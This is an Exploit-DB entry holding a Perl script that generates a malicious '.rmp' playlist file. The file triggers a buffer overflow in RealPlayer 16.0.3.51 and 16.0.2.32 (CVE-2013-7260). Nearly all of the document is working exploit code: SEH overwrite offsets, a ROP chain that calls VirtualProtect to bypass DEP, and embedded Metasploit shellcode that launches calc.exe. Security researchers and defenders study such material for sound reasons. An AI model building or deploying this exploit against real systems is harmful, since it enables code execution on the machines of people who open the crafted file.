RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow

EDB-ID:

30468




Platform:

Windows

Date:

2013-12-24


#!/usr/bin/perl

#-----------------------------------------------------------------------------#
# Exploit Title: RealNetworks RealPlayer Version Attribute Buffer Overflow    #
# Date: Dec 20 2013                                                           #
# Exploit Author: Gabor Seljan                                                #
# Vendor Homepage: http://www.real.com                                        #
# Software Link: http://www.oldapps.com/real.php?old_real_player=12814        #
# Version: 16.0.3.51, 16.0.2.32                                               #
# Tested on: Windows XP SP2/SP3 (DEP Bypass)                                  #
# CVE: CVE-2013-7260                                                          #
#-----------------------------------------------------------------------------#

use strict;
use warnings;

my $filename = "sploit.rmp";

my $junk1 = "\x41" x 44;          # Offset to ROP + Shellcode
my $junk2 = "\x43" x 1858;        # Offset to SEH when opening via click (2540)
my $junk3 = "\x44" x 11052;       # Offset to SEH when opening via menu (13600)
my $nSEH  = "\xeb\x06\x90\x90";   # Overwrite next SEH with JMP (6 bytes)
my $SEH   = pack('V',0x5acceecd); # ADD ESP,428 # RETN 10 [mswmdm.dll]
my $junk4 = "\x45" x 17000;       # Generate exception

my $rop_gadgets  = "";
   $rop_gadgets .= pack('V',0x77c1c552);  # RETN (ROP NOP) [msvcrt.dll]
   $rop_gadgets .= "\x42" x 16;  		      # JUNK
   $rop_gadgets .= pack('V',0x77c21d16);  # POP EAX # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c11120);  # &VirtualProtect() [IAT msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c1bb36);  # POP EBP # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c20497);  # skip 4 bytes [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c2362c);  # POP EBX # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x0000095c);  # 0x0000095C-> EBX
   $rop_gadgets .= pack('V',0x77c4cb29);  # POP EDX # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x00000040);  # 0x00000040-> EDX
   $rop_gadgets .= pack('V',0x77c1f519);  # POP ECX # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77C5D305);  # &Writable location [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c23b47);  # POP EDI # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c47a42);  # RETN (ROP NOP) [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c2ed13);  # POP ESI # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c2aacc);  # JMP [EAX] [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c12df9);  # PUSHAD # RETN [msvcrt.dll]
   $rop_gadgets .= pack('V',0x77c35459);  # PUSH ESP # RETN [msvcrt.dll]

my $nops = "\x90" x 16;

# msfpayload windows/exec CMD=calc.exe
my $shellcode = "\xb8\x2f\x9e\xa9\x6f\xdb\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1".
"\x33\x83\xea\xfc\x31\x42\x0e\x03\x6d\x90\x4b\x9a\x8d\x44\x02\x65\x6d\x95\x75".
"\xef\x88\xa4\xa7\x8b\xd9\x95\x77\xdf\x8f\x15\xf3\x8d\x3b\xad\x71\x1a\x4c\x06".
"\x3f\x7c\x63\x97\xf1\x40\x2f\x5b\x93\x3c\x2d\x88\x73\x7c\xfe\xdd\x72\xb9\xe2".
"\x2e\x26\x12\x69\x9c\xd7\x17\x2f\x1d\xd9\xf7\x24\x1d\xa1\x72\xfa\xea\x1b\x7c".
"\x2a\x42\x17\x36\xd2\xe8\x7f\xe7\xe3\x3d\x9c\xdb\xaa\x4a\x57\xaf\x2d\x9b\xa9".
"\x50\x1c\xe3\x66\x6f\x91\xee\x77\xb7\x15\x11\x02\xc3\x66\xac\x15\x10\x15\x6a".
"\x93\x85\xbd\xf9\x03\x6e\x3c\x2d\xd5\xe5\x32\x9a\x91\xa2\x56\x1d\x75\xd9\x62".
"\x96\x78\x0e\xe3\xec\x5e\x8a\xa8\xb7\xff\x8b\x14\x19\xff\xcc\xf0\xc6\xa5\x87".
"\x12\x12\xdf\xc5\x78\xe5\x6d\x70\xc5\xe5\x6d\x7b\x65\x8e\x5c\xf0\xea\xc9\x60".
"\xd3\x4f\x25\x2b\x7e\xf9\xae\xf2\xea\xb8\xb2\x04\xc1\xfe\xca\x86\xe0\x7e\x29".
"\x96\x80\x7b\x75\x10\x78\xf1\xe6\xf5\x7e\xa6\x07\xdc\x1c\x29\x94\xbc\xcc\xcc".
"\x1c\x26\x11\x7f\x72\x75\x0a\xf5\x98\x79\x2f\xb1\x76\x30\xe0\x3f\x49\x74\x0d".
"\x93\x42\x0c\xbf\x92\xb8\x4e\xba\x4a\xbe\x99\x71\x09\xf8\x14\xa9\x96\x91\x7e".
"\x7c\x77\x27\x25\x7b\x38\xd6\x9b\x33\xd5\xb5\x31\xe1\x66\xb7\xb4\x80\xd2\xfd".
"\x2d\xb6\x24\x43\x67\x90\xb2\xbb\x47\x40\x73\x3c\x3d\x97\x1c\x29\xd0\xf9\x70".
"\x4b\x78\x35\x9f\x4f\x2c\xb3\x7a\x05\x87\xf6\xd3\xeb\x48\xb0\x89\xf7\xe2\x41".
"\x1d\x8d\xb9\x15\x04\x2b\xfc\xa8\x3a\xd4\x37\x7d\x19\xf8\x7e\x08\xeb\x21\xe1".
"\x7b\x71\x75\x05\x3f\xbb\x66\x0c\x93\x3c\x8d\x98\x69\xf9\x7c\x27\x70\x48\x23".
"\xd4\x84\xf5\xbe\x72\x4e\xa8\x9b\x73\x25\x41\x81\xe0\x04\x40\x78\x79\x43\x37".
"\x7f\x2c\x96\xb9\xbf\x74\x77\x1d\x0d\x20\xfc\xb4\x91\xa9\xb8\x97\x4b\x18\xe3".
"\x49\x7d\x76\x3d\x47\xba\xb5\x14\x99\xb1\x24\x83\xe2\x10\xfd\x67\x7a\x4f\x35".
"\x9f\xb6\xb3\x7d\x75\x32\xe2\x4a\x86\xd5\xb2\xb7\xb0\x77\x11\xe0\x12\xd1\xeb".
"\x1c\x90\x7f\x42\x7c\x2d\x92\x72\x2f\x7a\x13\xc0\xd6\x76\x15\x99\x70\x14\x8d".
"\x4e\xbe\x96\xb7\x85\xff\xc1\xe1\x2d\xb0\x71\x1b\xd5\x1d\x02\xe3\x04\x7b\x05".
"\xb2\x73\x03\xf8\xb4\x7e\x1a\xfd\xb9\x37\x42\x4b\xb3\x39\xf9\x25\xb5\xa8\x3d".
"\xba\x92\x40\x4a\xb6\x24\x79\x27\x0c\xbb\x88\xfc\x3c\x35\x97\x4f\x9b\x47\x78".
"\x15\x41\x91\x66\xb1\x74\x0d\xbf\xb8\x90\x28\xd4\x2a\xf5\x3f\x43\x93\x98\x2c".
"\x1c\xa9\x2f\x48\x9f\x67\x49\x3b\xd6"; 

my $evil = $rop_gadgets.$nops.$shellcode;

my $sploit = $junk1.$evil.$junk2.$nSEH.$SEH.$junk3.$nSEH.$SEH.$junk4;

open(FILE, ">$filename") || die "[-]Error:\n$!\n";
print FILE "<?xml version=\"$sploit\"?>";
close(FILE);

print "Exploit file created successfully [$filename]!\n";